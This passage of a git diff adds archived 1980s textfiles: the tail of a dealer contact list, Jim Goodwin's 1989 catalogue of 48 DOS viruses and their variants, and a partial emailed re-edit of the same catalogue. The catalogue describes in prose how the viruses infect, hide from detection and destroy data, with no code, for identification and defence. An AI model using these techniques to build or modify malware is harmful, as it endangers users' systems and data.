Madison Avenue, Suite 202 + Fair Oaks, CA 95286 +Contact: Noel Morgan +Telephone: (916) 965-3112 +Fax: (916) 965-5713 + +UNITED STATES +ComputerLand of Sioux Falls, SD +Address: 3809 South Western Avenue + Sioux Falls, SD 57105 +Contact: Eric Hosen +Telephone: (605) 338-5263 +Fax: (605) 338-7130 + +UNITED STATES +The Computer Station +Address: 2600 South King Street, Suite 207 + Honolulu, HI 96826 +Telephone: (808) 942-7747 +Fax: (808) 942-5119 +BBS: (808) 247-7328 + +UNITED STATES - South +Computer Generations, Inc. +Address: P.O. Box 71 + Hendersonville, TN 37077-0071 +Contact: Cliff Jones +Telephone: (615) 865-1418 +Fax: ? + +UNITED STATES - Midwest +Computer Maintenence, Inc. +Address: 1433 Fullerton Avenue, Suite M + Addison, IL 60101 +Contact: Dan Eremenchuk +Telephone: (708) 953-1555 +Fax: (708) 953-1441 + +UNITED STATES - South +Computer Security Plus, Inc. +Address: 3900 South Tampa Avenue + Orlando, FL 32809 +Contact: Padgett Peterson +Telephone: (407) 352-6027 +Fax: (407) 352-6027 +BBS: (407) 352-6027 +Internet: padgett%tccslr.dnet@mmc.com + +UNITED STATES - South +Computers For Business +Address: 2843 Pembroke Road + Hollywood, FL 33020 +Contact: David Bennett +Telephone: (305) 920-9604 +Fax: (305) 921-6131 + +UNITED STATES +Computer Technology Associates +Address: 1901 E 37th Street, Suite 202 + Odessa, TX 79762 +Contact: John Minor +Telephone: (915) 368-5208 +Fax: (915) 368-4108 + +UNITED STATES - Southern California +Creative Business Concepts, Inc. +Address: 25231 Paseo de Alicia + Laguna Hills, CA 92653 +Contact: Rick Shafer +Telephone: (714) 855-9445 +Fax: (714) 855-0532 + +UNITED STATES - South +Crystal Data Systems +Address: 2104 West Ferry Way + Huntsville, AL 35801 +Contact: Doug West +Telephone: (205) 883-4233 +Fax: (205) 883-4293 + +UNITED STATES +DataLan Corporation +Address: 50 Main Street, Suite 1000 + White Plains, NY 10606 +Contact: John Arnold +Telephone: (914) 682-2022 +Fax: (914) 682-2123 + +UNITED STATES +DataTek Computer Services +Address: 547 Wunder Street + Reading, PA 19602-2005 +Contact: Kirk Wentzel +Telephone: (215) 374-2097 +BBS: (215) 374-3735 + +UNITED STATES - South +Data Integrity +Address: 5301 North Federal Highway, Suite 130 + Boca Raton, FL 33487 +Contact: Neil Kutchera +Telephone: (407) 998-7540 +Fax: (407) 998-7587 + +UNITED STATES - Southern California +FOCAL +Address: 15500 Erwin Street, Suite 2002 + Van Nuys, CA 91411 +Telephone: (818) 376-6598 +Fax: (818) 376-6594 + +UNITED STATES +Genoa Group +Address: 7334 South Alton Way, Unit H + Englewood, CO 80112 +Contact: William L Ross +Telephone: (303) 770-5747 +Fax: (303) 742-2449 + +UNITED STATES - Northern California +GW Associates +Address: 149 Forest Side Avenue + San Francisco, CA 94217 +Contact: George Wertheim +Telephone: (415) 661-0968 + (510) 577-3528 +Fax: ? + +UNITED STATES +Hornbeck's +Address: 406 Walnut Street + Red Bluff, CA 96080 +Contact: Kevin Evenson +Telephone: (916) 527-1201 +Fax: (916) 529-3621 + +UNITED STATES - Midwest +Inacomp-Decatur, IL +Address: 1690 Houston Drive + Decatur, IL 62526 +Contact: Marshall Sperry +Telephone: (217) 875-7611 +Fax: (217) 875-7611 + +UNITED STATES - East +Innovative Business Solutions +Address: 222 W Grand Avenue + Montvale, NJ 07645 +Contact: Richard Verlaque +Telephone: (201) 391-0200 +Fax (201) 291-9803 + +UNITED STATES - New York +International Security Technology Inc. +Address: 99 Park Avenue - 11th Floor US Re + New York, NY 10022 +Contact: Robert V. Jacobson +Telephone: (212) 557-0900 +Fax: (212) 808-5206 + +UNITED STATES - Great Lakes States +James C. Shaeffer and Associates + +Detroit Office: +Address: 5025 Venture Drive + Ann Arbor, MI 48108 +Contact: James C. Shaeffer +Telephone: (800) 968-9527 +Fax: (313) 741-9528 +Mobile: (313) 670-7354 (If no answer, please leave name and number) +cc:Mail: (313) 741-9533 Name: James C. Shaeffer, PO: JCS_PO +BBS: (313) 741-9529 [PPI 14,400bps v.32/v.42bis 8N1 line settings] + +Chicago Office: +Address: 744 Fox Hunt Trail + Deerfield, IL 60015 +Contact: David Shook +Telephone: (312) 399-9364 +Fax: (313) 741-9528 +cc:Mail: (313) 741-9533 Name: David C. Shook, PO: JCS_PO +BBS: (313) 741-9529 [PPI 14,400bps v.32/v.42bis 8N1 line settings] + +UNITED STATES - East +Jetics Inc. +Address: 8229 Boone Blvd. Suite 860 + Vienna, VA 22182 +Contact: Wayne Carpenter +Telephone: (703) 893-4404 +Fax: (703) 821-0710 + +UNITED STATES +Joseph Head Cooper Consulting +Address: 321 West Craig Place + San Antonio, TX 78212 +Contact: Joe Cooper +Telephone: (512) 736-2383 + +UNITED STATES +Juniper Systems, Inc. +Address: 2 Newton Executive Park + Newton Lower Falls, MA 02162-1434 +Contact: Stu Tischler +Telephone: (617) 965-2525 +Fax: (617) 965-4950 + +UNITED STATES +Kortek Industries +Address: 2000 Bering Drive, Suite 400 + Houston, TX 77057 +Contact: John Heaney +Telephone: (713) 783-0024 +Fax: (713) 783-7649 + +UNITED STATES +M.S. Business Center +Address: 6161 El Cajon Blvd., Suite B-15 + San Diego, CA 92115 +Telephone: (619) 583-4960 +Fax: (619) 583-9375 + +UNITED STATES +Micro Networks of America +Address: 320 Main Street + Farmington, CT 06034 +Contact: Paul Dandrow +Telephone: (203) 678-7400 +Fax: (203) 678-9437 + +UNITED STATES - Northern California +Microplus Systems Technologies +Address: 1020 East El Camino Real + Sunnyvale, CA 94087 +Contact: Ralph Manildi or Bui Han +Telephone: (408) 737-2525 +Fax: (408) 737-2402 + +UNITED STATES - South +Micro Tech Systems +Address: 701 East Bay Street + Box 1313 + Charleston, SC 29403 +Contact: Curtis Clark +Telephone: (803) 724-3480 +Fax: (803) 724-3400 + +UNITED STATES - Southeast +Monterey-Waldec, Inc. +Address: 4899 West Waters Avenue + Tampa, FL 33634 +Contact: Andy Swenson +Telephone: (813) 882-9066 +Fax: (813) 882-9910 + +UNITED STATES +NETLAN +Address: 29 West 38th Street + New York, NY 10018 +Contact: Al Berg +Telephone: (212) 768-2273 +Fax: (212) 768-2201 +BBS: (212) 764-3876 + +UNITED STATES +NetPro Computing, Inc. +Address: 8655 East Via de Ventura #E155 + Scottsdale, AZ 85258 +Contact: Corbin Glowacki +Telephone: (602) 998-5008 + (800) 998-5090 +Fax: (602) 998-5076 +BBS: (602) 998-5093 [1200-14,400bps v.32/v.42bis] + + +UNITED STATES +Network Engineering & Comm. +Address: 14718 NE 87th Street + Redmond, WA 98052 +Contact: Dan Kidd +Telephone: (206) 861-1778 +Fax: (206) 891-1704 + +UNITED STATES +NH&A (formerly NHFA) +Address: 577 Isham Street, Suite 2B + New York, NY 10034 +Contact: Norman Hirsch +Telephone: (212) 304-9759 ext. 1 +Fax: (212) 304-9759 +BBS: (212) 304-9759 ext. 3 + +UNITED STATES - Pacific Northwest +OverFlow Corporation +Address: 8950 SW Burnham Street + Portland, OR 97223-6103 +Contact: Jenice Shaw +Telephone: (503) 598-1871 +Fax: (503) 598-1876 + +UNITED STATES - Northern California +PCS Networks +Address: 5900-T Hollis Street + Emeryville, CA 94608 +Contact: Tim Cuny +Telephone: (510) 655-6500 + (415) 986-1800 +Fax: (510) 655-9298 + +UNITED STATES - Northern California +Peacham Cybernetics +Address: PO Box 70367 + Sunnyvale, CA 94086-0367 +Contact: Fritz Schneider +Telephone: (408) 739-3303 +Fax: (408) 739-3302 +CompuServe: 71043,1117 +Internet: 71043.1117@compuserve.COM + +UNITED STATES - West +Pueblo Group +Address: 6318 E. Calle Cappela + Tucson, AZ 85710 +Contact: Bill Logan +Telephone: (602) 321-2075 +Fax: (602) 881-8474 +BBS: (602) 747-5236 +Internet: blogan@solitud.fidonet.org + +UNITED STATES +Ramcom Technology +Address: PO Box 3491 + Flagstaff, AZ 86003-3491 +Contact: Ron Moore +Telephone: (602) 779-3204 +Fax: (602) 779-3204 +BBS: (602) 779-3265 + +UNITED STATES +Rational Elegance +Address: 14636 NE 42nd Place #N202 + Bellevue, WA 98007-3311 +Contact: Robert Gryphon +Telephone: (206) 885-5499 +Cellular: (206) 940-1124 +Fax: (206) 885-5499 + +UNITED STATES +Sparrow Copmuter Systems, Inc +Address: 616 S. Broad Street + Lansdale, PA 19446 +Contact: Bill Mann +Telephone: (215) 368-9500 +Fax: (215) 368-9522 + +UNITED STATES +SSDS, Inc. +Address: Special Projects & Government Support + PO Box 71827 + Ft. Bragg, NC 28307 +Contact: John H. Kida +Telephone: (703) 827-0806 ext. 204 [24 hour voice mail] +BBS: (919) 867-0754 [1200-14,400 bps, Dual Std. & BIS] +Internet: jhk@washington.ssds.com + +SSDS, Inc. - AUSTIN OFFICE +Address: 3102 Bee Caves Rd, Suite C + Austin, TX 00000-0000 +Contact: Gilbert Silva +Telephone: (512) 329-5731 +Fax: (512) 329-5726 + +SSDS, Inc. - HUNTSVILLE OFFICE +Address: 200 West Coute Square, Suite 988 + Huntsville, AL 35801 +Contact: Matt Petty +Telephone: (205) 534-8383 + +SSDS, Inc. - RALIEGH OFFICE (North Carolina) +Address: 3101 Poplarwood Court, Suite 108 + Raliegh, NC 27604 +Contact: John Noss +Telephone: (919) 954-0400 +Fax: (919) 954-0403 + +SSDS, Inc. - WASHINGTON, DC OFFICE +Address: 8150 Leesburg Pike, Suite 1100 + Vienna, VA 22182 +Contact: Patrick Siemon +Telephone: (703) 827-0806 +Fax: (703) 827-0716 + +SSDS, Inc. - CHICAGO OFFICE +Address: 1755 Park Street, Suite 180 + Naperville, IL 60504 +Contact: Mark Kilgore +Telephone: (708) 778-7737 +Fax: (708) 778-7740 + +SSDS, Inc. - SEATTLE OFFICE +Address: 1309 - 114th Ave SE, Suite 104 + Bellevue, WA 98004 +Contact: Brett Burris +Telephone: (206) 453-9141 + +SSDS, Inc. - DENVER OFFICE +Address: 6595 S. Dayton Suite 3000 + Englewood, CO 80111 +Contact: Del Blackketter +Telephone: (303) 790-0660 +Fax: (303) 790-1663 + +UNITED STATES - Eastern Seaboard +Tecnimat/TDS +Address: 180 South Ban Brunt Street + Englewood, NJ 07631 +Contact: Sheree Parke +Telephone: (201) 569-4200 +Fax: (201) 569-2274 + +UNITED STATES +Typetronics Business Systems Inc +Address: 5717 North 7th Street + Phoenix, AZ 85014 +Contact: Roger Smith +Telephone: (602) 274-7253 +Fax: (602) 274-7636 + +UNITED STATES - New England +VacciVirus +Address: 84 Hammond Street + Waltham, MA 02154 +Contact: Roger Aucoin +Telephone: (617) 893-8282 +Fax: (617) 893-3770 + +UNITED STATES +ValCom More than Computers Inc. +Address: 2249 Pinehurst Drive + Middleton, WI 53562 +Contact: Gary Hoffman +Telephone: (608) 836-8180 +Fax: (608) 836-7401 + +UNITED STATES +Wang Laboratories +Address: 7500 Old Georgetown Rd + Bethesda, MD 20814 +Contact: Bill Repine +Telephone: (301) 657-5028 +Fax: (301) 657-5971 + diff --git a/textfiles.com/virus/allvirus.vir b/textfiles.com/virus/allvirus.vir new file mode 100644 index 00000000..14d04806 --- /dev/null +++ b/textfiles.com/virus/allvirus.vir @@ -0,0 +1,530 @@ +PC VIRUS LISTING +By Jim Goodwin + This document is copyrighted, 1989, by Jim Goodwin. It + may be freely distributed provided no changes, + additions or deletions are made, and providing this + copyright notice accompanies all copies. I would like + to thank John McAfee and the entire HomeBase users + group for providing the raw materials for this + document. + + + It is difficult to name, identify and classify PC viruses. +Everyone who first discovers a virus will name it and describe +what they think of it. In most cases, the virus is not new and +has been named and described dozens of times before. None of the +names and few of the descriptions will match. While I'm writing +this, for example, I feel certain that someone, somewhere has +just been infected by the Jerusalem virus and they are telling +their co-workers and friends about it as if it were newborn - and +for them perhaps it is. It will be impossible to verify the +strain and variety of the infection, however, unless we can get a +living sample of the virus to analyze and compare with other +strains of this same virus. So problem number one is filtering +the reports of infection and collecting samples that can be +placed under the knife. + Problem number two is - where do you draw the line between +an original virus and a true variation of the virus? The +original Brain virus, for example, could only infect a floppy +diskette. Do the varieties of the Brain that can infect hard +disks (but in every other respect are identical) deserve to be +called new viruses, or are they still the Brain? What about +further modifications that destroy data? Is this now a new +virus? What if someone extracts a segment of the Brain code and +uses it as a basis for a new virus? What if nothing changes but +the imbedded text data, so that the virus is in every way +functionally identical, but the volume label changes to "SMURF" +instead of BRAIN. All of these modifications to the Brain have +been discovered and logged. How do we deal with them? + I choose to deal with these modifications in the simplest +way I know. If the virus differs in any way from the original +(assuming that the "original" can in fact be identified), then I +log it as a new strain. This relieves me from having to make +decisions. Those of you who see the world differently can merely +take this listing and lump together all of the different strains +that you like. That way we'll all be happy. + + This will be, by the way, my last virus document. I have +worked double time for the past eighteen months helping John +McAfee and his Homebase folks and, while I have thouroughly +enjoyed myself, I have finally burned out. It has been great fun +and I've learned a lot, and hopefully some of my works, like the +product review with Sankary and Marsh, will end up being somehow +useful to the world. But now I have the irresistible urge to go +fishing, and, perhaps afterwards, to contemplate my navel for a +few years. In-between times I intend to write a book on the +craziness in this industry and about the unique personalities +I've had the pleasure to work with in the Virus Marine Corps. +It's been quite an adventure. Thank you all. + +Jim Goodwin From the Homebase BBS 408 988 4004 + + + + + THE VIRUSES + + I have arranged these viruses so that similar varieties are +described in the sequence in which they appeared within the virus +sub-group (to the best of my knowledge). Not everyone agrees +with my groupings. Many people believe, for instance, that the +Golden Gate-C (Mazatlan Virus) is a distinctly original virus and +is not a variation of the Alameda. I think differently and have +endeavored to show how the Golden Gate evolved from the Alameda, +through each precursor virus. I cannot prove, of course, that +the sequence of appearances is the correct sequence, and in many +cases I have had to guess. If anyone wishes to re-order +these virus, I will not be offended. + I have not included any of the specific application trojans +in this list. There has been a lot of discussion about the Lotus +123 and DBASE "viruses", for example. These are not replicating +programs and I do not classify them as viruses. I had originally +intended a separate list to include these non-replicating trojans +but Time caught up with me. + + + +1. ALAMEDA VIRUS + (Also called: Yale; Merritt; Pecking; Seoul) + + This is a boot sector infector. First discovered at Merritt + college in California (1987). Original version caused no + intentional damage. Replicates at boot time -- + and infects only 5 1/4" 360KB floppies. It saves the + real boot sector at track 39, sector 8, head 0. Contains a + count of the number of times it has infected other + diskettes, although it is referenced for write only and is + not used as part of an activation algorithm. The virus + remains resident at all times after it is booted, even if no + floppy is booted and BASIC is loaded. Contains a rare POP + CS instruction that makes it incapable of infecting 286 + systems. + +2. ALAMEDA-B + (Also called Sacramento Virus) + + This is the original Alameda Virus that has the POP CS + removed. Relocation is accomplished through a long jump + instruction. All other characteristics are identical. This + version runs OK on a 286. + +3. ALAMEDA-C + + This is the Alameda-B virus that has been modified to + disable the boot function after 100 infections. The + counter in the original Alameda virus has been re-activated + and is interrogated at each bootup. When it reaches 100 the + virus disconnects from the original boot sector (control is + no longer passed) and the diskette will no longer boot. At + infection time, the counter is zeroed on the host diskette. + +4. SF VIRUS + + This is the Alameda-C that has been modified to format the + boot diskette when the counter runs out. + +5. GOLDEN GATE VIRUS + (Also called The 500 Virus) + + This is the SF Virus that has been modified to format the C + drive when the counter runs out. The activation occurs + after 500 infections, instead of 100 infections. Note that + in all three of these strains, the counter is zeroed on the + host diskette at infection time. Thus, the activation + period on this virus will on the average stretch into many + years. No corruption will occur until 500 new diskettes + have been infected from within a given machine. Since the + infection can only occur when the system is booted with a + new diskette, infection is not frequent with this virus. I + expect that the overwhelming majority of infections will + never activate. The IBM PC will have long since been + supplanted by another architecture in most environments. + +6. GOLDEN GATE-B + + This virus is the Golden Gate virus that has had the + activation delay reset to 30 infections. This virus should + activate within a couple of years in most environments. + +7. GOLDEN GATE-C + (Also called the Mazatlan Virus) + + This virus is the Golden Gate virus that is able to infect a + hard disk. It is a nasty virus, since it has more of an + opportunity to do damage than previous versions. Prior + versions were limited since systems with hard disks are only + infrequently booted from floppy and booting from hard disk + overwrote earlier versions. + +8. GOLDEN GATE-D + + This virus is identical to number 7, except the counter has + been disabled (similar to original Alameda). + +9. THE BRAIN + (Also called, Pakistani Brain; Basit Virus) + + This virus originated in January, 1986, in Lahore Pakistan. + It is the only virus yet discovered that includes the valid + names address and phone numbers of the original + perpetrators. The Brain is a boot sector infector, + approximately 3K in length, that infects 5 1/4" floppies. + It cannot infect hard disks. It will infect a diskette + whenever the diskette is referenced. For example, a + Directory command, executing a program from the diskette, + copying a file from or to the diskette or any other access + will cause the infection to occur. The virus stores the + original boot sector, and six extension sectors, containing + the main body of the virus, in available sectors which are + then flagged as bad sectors. + + The virus is able to hide from detection by intercepting any + interrupt that might interrogate the boot sector and re- + directing the read to the original boot sector. Thus, + programs like the Norton Utilities will be unable to see the + virus. + + Infected diskettes are noticeable by "@BRAIN" displayed in + the volume label. + +10. BRAIN-B + (Also called Brain-HD; the Hard Disk Brain; Houston Virus) + + This virus is identical in every respect to the original + Brain, with the single exception that it can infect the C + drive. + +11. BRAIN-C + + This virus is the Brain-B that has the volume label code + removed. The volume label of infected diskettes does not + change with this virus. This virus was difficult to detect + since it does nothing overt in the system. + +12. CLONE VIRUS + + This virus is the Brain-C that saves the original boot + copyright label and restores it to the infected boot. The + Basit & Mjad original Brain messages have been replaced with + non-printable garbage that looks like instructions if viewed + through Norton or other utility. Even if the system is + booted from a clean diskette, it is virtually impossible to + tell, by visual inspection, whether the hard disk is + infected. + +13. SHOE_VIRUS + (Also called UIUC Virus) + + This virus is the Brain-B Virus that has been modified to + include the message - "VIRUS_SHOE RECORD, v9.0. Dedicated + to the dynamic memories of millions of virus who are no + longer with us today". The message is never displayed. + +14. SHOE_VIRUS-B + + This is the Shoe_Virus that has been modified to so that it + can no longer infect hard disks. The v9.0 has been changed + to v9.1. + +15. ClONE-B + + This is the Clone virus that has been modified to corrupt + the FAT when it is booted after May 5, 1992. There are no + other apparent modifications. + +16. DOS-62 + (Also called the UNESCO Virus) + + This virus is a COM infector. It was first discovered in + Moscow in April, 1988. It was first publicized in August + 1988 when it cropped up at a children's computer Summer camp + run by UNESCO. When a program infected by this virus is + executed, it infects one other COM file in the system. On a + random basis, infected programs will perform a system re- + boot when they are executed. + +17. 62-B + + This virus is similar to DOS-62 except the re-boot is + replaced by deleting the executed program. + +18. FRIDAY THE 13th + (Also called COM Virus; 512 virus) + + This virus is a non-resident COM infector that first + appeared in South Africa in 1987. At each execution of an + infected program the virus seeks out two other COM files on + the C drive and one COM file on the A drive and infects + them. The virus is extremely fast and the only indication + of infection occurring is the access light on the A drive + (if the current drive is C). The virus will only infect a + file once. + + On every Friday 13 the virus deletes the host program if it + is executed on that day (similar to the Jerusalem). + +19. Friday 13th-B + + This virus is identical to the original except that it + infects every file in the current subdirectory. The only + way this virus can spread beyond the current subdirectory is + if an infected program ends up in the system PATH. Then + every COM file in the currently selected subdirectory will + get infected. + +20. Friday 13th-C + + This is the 13th-B except a message has been added that + displays - "We hope we haven't inconvenienced you" appears + whenever the virus activates. + +21. JERUSALEM + (Also called Israeli; Friday the 13th; PLO) + + This virus is a memory resident COM and EXE infector. It + was first discovered at the Hebrew University in Jerusalem + in the fall of 1987. It contains a flaw which makes it re- + infect EXE files over and over until the files become too + big to fit into memory. The virus re-directs interrupt 8 + (among others) and one-half hour after an infected program + loads, the new timer interrupt introduces a delay which + slows down the processor by a factor of about 10. On every + Friday the 13, the virus deletes every program executed + during the day. + +22. JERUSALEM-B + + This virus is identical to the Jerusalem except it is able + to successfully identify pre-existing infections in EXE + files and will only infect them once. + +23. JERUSALEM-C + (Also called the New Jerusalem) + + This virus is identical to Jerusalem-B except that the timer + interrupt delay code has been bypassed. This virus is + virtually invisible until it activates. + +24. BLACK HOLE + (Also called the Russian Virus) + + This virus is the Jerusalem-C that has odd text and + additional code that is never referenced. A new interrupt + eight routine is added to the non referenced area and a + number of interrupt 21 calls which appear meaningless. The + additional text includes - "ANTIVIRUS". It appears that + this virus is a modified version of some previous variety of + the Jerusalem which we have not yet seen. + +25. JERUSALEM-D + + This is the Jerusalem-C that destroys both versions of the + FAT on any Friday the 13th after 1990. The code that + originally deleted executed programs has been overwritten + with the FAT destructive code. + +26. JERUSALEM-E + + This is identical to the D variety except the activation is + any Friday the 13th after 1992. + +27. CENTURY VIRUS + (Also called the Oregon Virus) + + This is similar to the Jerusalem-C except the activation + date is January 1, 2000. When the virus activates, it + erases both FATs on all connected drives and then begins + writing zeroes to every sector on every attached device. If + allowed to continue to completion, it displays the message - + " Welcome to the 21st Century". + +28. CENTURY-B + + This virus is similar to the original Century virus with the + following exception: + + It waits for BACKUP.COM to be executed and then garbles all + program writes. After BACKUP terminates, the output + functions return to normal. + +29. 1701 + (Also called Cascade; Falling Tears) + + This virus evolved from a trojan horse disguised as a + utility to automatically turn off the num-lock light at + system boot. The trojan horse caused the characters on the + screen to fall to the bottom of the screen in systems with + CGA monitors. In late 1977 this trojan horse was turned + into a memory resident COM virus. It gets it's name from + the size increase of infected COM files - 1701 bytes. The + virus has some unique qualities: + - It uses an encryption algorithm to avoid detection + and complicate any attempted analysis. + - It contains a sophisticated activation algorithm + that is based on randomizations, machine types, + monitor type, presence or absence of clock cards, + and time of year. + - It was designed to infect only IBM clones. True + IBM systems would be spared. + The virus has a bug that causes the machine selection + algorithm to fail. The virus activates on any machine with + a CGA or VGA monitor, in the months of September, October, + November or December in the year 1980 or 1988 (systems + without clock cards will often have a date set to 1980). + +30. 1701-B + + This virus is identical to the 1701 except that it activates + in the fall of any year. + +31. 1704 + (Also called Cascade; Falling Tears) + + I would prefer to classify this virus as a variety of the + 1701 but it has been universally referred to as a separate + virus, so I will go along with the crowd on this one. It is + functionally identical to the 1701 except that the IBM + selection bug has been repaired. The new virus is three + bytes longer. In every other respect it is the same. + +32. 1704-B + + This virus is identical to the 1704, except the cascade + display has been replaced with a system re-boot when the + virus activates. The activation uses the same interrupt 8 + randomization algorithm, so the reboot will occur at a + random time interval after executing an infected program on + or after the activation date. + +33. 1704-C + + This virus is the same as the 1704-B, except the activation + date has been changed to occur in December of any year. + +34. 1704-D + + This virus is the same as the 1704, except the IBM selection + has been disabled (the virus infects true IBM PCs). + +35. LEHIGH + + This is a COMMAND.COM infector that first surfaced at Lehigh + University in late 1987. It is the widest known virus, the + most discussed and the most analyzed of all the viruses, so + I won't waste any more time on it. + +36. SEARCH + (Also called Den Zuk; Venezuelan) + + This is a boot sector infector that infects 360KB 5 1/4" + floppies. It infects through any access to the host + diskette. It can survive a warm reboot. It will infect + data (non-system) diskettes, which in turn can pass on the + infection if an accidental attempt to boot from the data + disk occurs. It has a bug which causes it incorrectly + attempt to infect 3.5" diskettes. This will overwrite the + diskette's FAT and cause a read (or write) failure. It + cannot infect a hard disk, and will not attempt to do so. + If an infected system is rebooted from the hard disk, the + virus will de-activate. This is not the case with rebooting + from a clean floppy - which will become infected. + + The virus causes CGA, EGA and VGA screens to display a + purple "DEN ZUK" graphic to appear after a -- + . It causes no damage. + +37. SEARCH-HD + + This virus is identical to the Search Virus, except it's + able to infect hard disks. + +38. SEARCH-B + + This virus is identical to the Search virus, but + unsuccessful modifications have been made to fix the 3.5" + diskette problem. The 3.5" infection still fails, plus + unsuccessful attempts to infect the hard disk will occur + which result in system failure in some systems. + +39. SYS VIRUS + + This virus is really a modification of the Search-HD virus. + The display code has been replaced (no display occurs on + reboot) by code that disables the SYS program. The SYS + program itself is not modified, but any attempt to execute + SYS will result in the program not being loaded. Instead, + multiple reads to the source and target drives will occur + (to simulate the SYS activity). The normal SYS message + output is displayed by the virus at the appropriate time. + This virus will successfully avoid being removed by SYS. + The virus does no damage. + +40. SYS-B + + This is similar to the SYS virus, but it performs a hard + disk format on any Friday 13th after 1990. This virus, and + its precursor virus both still contain the 3.5" bug, so that + they are easily detected on systems using 3.5" drives. They + are difficult to detect on other systems. + +41. SYS-C + + Similar to the SYS virus but performs random reboots + beginning 2 hours after power-on or initial boot. + +42. 648 VIRUS + (Also called the Austrian Virus) + + This is a COM infector that increases the size of the + infected file by 648 bytes. It was first reported in London + in the fall of 1988. It is not a memory resident virus. It + infects the next uninfected COM file in the current + directory (similar to the original Friday 13th). It does no + overt damage. + +43. 648-B + + This is similar to the 648, but it causes infrequent errors + in the infected COM file so that the file will not execute. + Approximately one file in ten will be corrupted. + +44. STONED + (Also called New Zealand Virus) + + This is a boot sector infector that infects 360 KB 5 1/4" + floppies. It was first reported in Wellington, New Zealand + in early 1988). It displays - "Your computer is now stoned. + + Legalize Marijuana" every 8th bootup. No overt damage. + Unable to infect hard disk. + +45. STONED-B + + Variation of Stoned. Has been changed to be able to infect + hard disks. The hard disk is infected as soon as an + infected floppy is booted. No intentional damage done, + except systems with RLL controllers will frequently hang. + +46. STONED-C + + This is the Stoned-B virus that no longer displays the + "Stoned" message. This virus is difficult to detect. + +47. VERA CRUZ + (Also Called Bouncing Ball; Italian Virus) + + This is a boot sector virus that was first reported in March + 1988. It is a floppy-only infector. + + When this virus activates (randomly) a bouncing dot appears + on the screen and can only be removed through reboot. No + other damage is done. + +48. VERA CRUZ-B + + This is a variation of the Vera Cruz that is able to infect + Hard disks. + + + + \ No newline at end of file diff --git a/textfiles.com/virus/allvirusdf.vir b/textfiles.com/virus/allvirusdf.vir new file mode 100644 index 00000000..82257cf4 --- /dev/null +++ b/textfiles.com/virus/allvirusdf.vir @@ -0,0 +1,732 @@ +From mcvax!cs.hw.ac.uk!davidf@uunet.UU.NET Sun May 7 14:33:38 1989 +Received: from uunet.UU.NET by atanasoff.cs.iastate.edu (3.24.1) id AA15611; Sun, 7 May 89 14:33:16 CDT +Received: from mcvax.UUCP by uunet.uu.net (5.61/1.14) with UUCP + id AA16504; Sun, 7 May 89 15:33:04 -0400 +Received: by mcvax.cwi.nl via EUnet; Sun, 7 May 89 21:22:35 +0200 (MET) +Received: from cs.hw.ac.uk by kestrel.Ukc.AC.UK via Janet (UKC CAMEL FTP) + id aa25450; 7 May 89 20:08 BST +Received: from surya.cs.hw.ac.uk (surya) by brahma.cs.hw.ac.uk; Sun, 7 May 89 20:05:07 BST +From: "David.J.Ferbrache" +Message-Id: <4405.8905071907@surya.cs.hw.ac.uk> +Subject: Virus list (Homebase bulletin board and others) +To: brunnstein@rz.informatik.uni-hamburg.dbp.de, + OJA , + RADAI1 , + luken , + jwright@atanasoff.cs.iastate.edu, well!odawa@uunet.UU.NET +Date: Sun, 7 May 89 20:07:33 BST +Cc: rzotto , + r746ll12 , + chess@cs.heriot-watt.ac.uk, drsolly@ibmpcug.co.uk, + utoday!greenber@uunet.UU.NET +X-Mailer: ELM [version 2.2 PL0] +Status: R + + +Please find enclosed for your information and comment a listing of IBM PC +viruses from Jim Goodwin's Homebase BBS which Jim Wright passed on to me. +I have restructure the original document slightly to place each of his +48 viruses under the original parent virus, so that strains of Brain are +grouped together. I have also added a few comments of my own in brackets. + +Can I strongly suggest we pool our resources so that one comprehensive list +can be produced. It would seem well worth contacting Jim to arrange for +details of 1. the new viruses he describes, and 2. the modifications of +well know viruses which he has observed. + + + + +PC VIRUS LISTING +by Jim Goodwin + +[edited without permission by Dave Ferbrache] + + It is difficult to name, identify and classify PC viruses. +Everyone who first discovers a virus will name it and describe +what they think of it. In most cases, the virus is not new and +has been named and described dozens of times before. None of the +names and few of the descriptions will match. While I'm writing +this, for example, I feel certain that someone, somewhere has +just been infected by the Jerusalem virus and they are telling +their co-workers and friends about it as if it were newborn - and +for them perhaps it is. It will be impossible to verify the +strain and variety of the infection, however, unless we can get a +living sample of the virus to analyze and compare with other +strains of this same virus. So problem number one is filtering +the reports of infection and collecting samples that can be +placed under the knife. + + Problem number two is - where do you draw the line between +an original virus and a true variation of the virus. The +original Brain virus, for example, could only infect a floppy +diskette. Do the varieties of the Brain that can infect hard +disks (but in every other respect are identical) deserve to be +called new viruses, or are they still the Brain? What about +further modifications that destroy data? Is this now a new +virus? What if nothing changes but the imbedded text data, so +that the virus is in every way functionally identical, but the +volume label changes to "SMURF" instead of BRAIN. All of these +modifications to the Brain have been discovered and logged. How +do we deal with them? + I choose to deal with these modifications in the simplest +way I know. If the virus differs in any way from the original +(assuming that the "original" can in fact be identified), then I +log it as a new virus. This relieves me from having to make +decisions. Those of you who see the world differently can merely +take this listing and lump together all of the different strains +that you like. That way we'll all be happy. + +[have done Jim, it does seem simpler to me and allows tracing of the + evolution of viruses. I personally think an edited text string does + not constitute a new virus, although I agree the line is often hard to + judge] + + This will be, by the way, my last virus document. I have +worked double time for the past eighteen months helping John +McAfee and his Homebase folks and, while I have thouroughly +enjoyed myself, I have finally burned out. It has been great fun +and I've learned a lot, and hopefully some of my works, like the +product review with Sankary and Marsh, will end up being somehow +useful to the world. But now I have the irresistible urge to go +fishing, and, perhaps afterwards, to contemplate my navel for a +few years. In-between times I intend to write a book on the +craziness in this industry and about the unique personalities +I've had the pleasure to work with in the Virus Marine Corps. +It's been quite an adventure. Thank you all. + +Jim Goodwin + + + + + THE VIRUSES + + I have arranged these viruses so that similar varieties are +described in the sequence in which they appeared within the virus +sub-group (to the best of my knowledge). Not everyone agrees +with my groupings. Many people believe, for instance, that the +Golden Gate-C (Mazatlan Virus) is a distinctly original virus and +is not a variation of the Alameda. I think differently and have +endeavored to show how the Golden Gate evolved from the Alameda, +through each precursor virus. I cannot prove, of course, that +the sequence of appearances is the correct sequence, and in many +cases I have had to guess. If you anyone wishes to re-order +these virus, I will not be offended. + I have not included any of the specific application trojans +in this list. There has been a lot of discussion about the Lotus +123 and DBASE "viruses", for example. These are not replicating +programs and I do not classify them as viruses. I had originally +intended a separate list to include these non-replicating trojans +but Time caught up with me. + + + +[BOOT SECTOR AND PARTITION RECORD VIRUSES] +[----------------------------------------] + +[ALAMEDA VIRUS AND VARIANTS] + +(Also called: Yale; Merritt; Pecking; Seoul) + +First discovered at Merritt college in California (1987). +Original version caused no intentional damage. 